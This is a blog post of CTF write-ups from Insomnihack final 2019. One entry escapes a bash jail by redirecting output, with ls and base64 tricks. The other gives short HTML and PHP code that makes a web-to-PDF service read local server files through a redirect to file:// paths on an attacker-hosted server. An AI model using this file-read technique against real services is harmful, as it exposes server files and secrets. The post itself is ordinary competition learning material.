Saturday, March 23, 2019

[Writeup] Insomnihack final 2019

myBrokenBash

For this challenge, the author give us something about stdout and when I try to send something the server will reply the string that I send, it's make me remember to a challenge in Ringzer0 CTF about bash shell jail escaping. It use file description to bypass stdout. Redirect from stdout to stdin by ls * 1>&0 I can see the flag file.


But I got the problem when I try to cat a flag, I only have a half flag



Maybe another file contain another half flag but the grep command only direct me to that file, so I think it have been filtered output. After a little help form my mates, I used base64 command and got a flag.


Flag: INS{c@t_th3_Flag_1t_s_n0t_so_ea4y}

EZGEN

I write this writeup base on my mate solution, I just help him found flag's direction because I found it at mybashbroken. This challenge have problem is LFI and he wrote a code on his vps to get flag. The code below is just a old version because he reset windows after competion end so I can't have best code for you.

index.html


 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <title></title>
  <link rel="stylesheet" href="">
</head>
<body>
  <iframe width="800" height="800" src="http://<IP_YOUR_SERVER>/file.php?file=/var/www/html/webtopdf.php"></iframe>
</body>
</html>

file.php


1
2
3
4
<?php
$filename = $_GET['file'];
header("Location: file://$filename");
?>

The flag saved at /flag
(This is my first test, correct is /flag not flag)
And I got flag


Related Posts:

  • [Writeup] Insomnihack final 2019 myBrokenBash For this challenge, the author give us something about stdout and when I try to send something the server will reply the string that I send, it's make me remember to a challenge in Ringzer0 CTF about bash shell… Read More
  • [Writeup] HSCTF 2019 FORENSICS Chicken Crossing Use strings and grep command in linux I have a flag. Flag: hsctf{2_get_2_the_other_side} Cool Image The author give us a file with extension is .pdf, but I can open it, check back the… Read More
  • [Writeup] OverTheWire - BanditLevel 1: Thử thách này sau khi kết nối đến server dùng lệnh ls, chúng ta thấy một file readme cat file đó chúng ta có được password cho level tiếp theo. Password: boJ9jbbUNNfktd78OOpsqOltutMc3MY1 Level 2: Dùng lệnh l… Read More

0 comments:

Post a Comment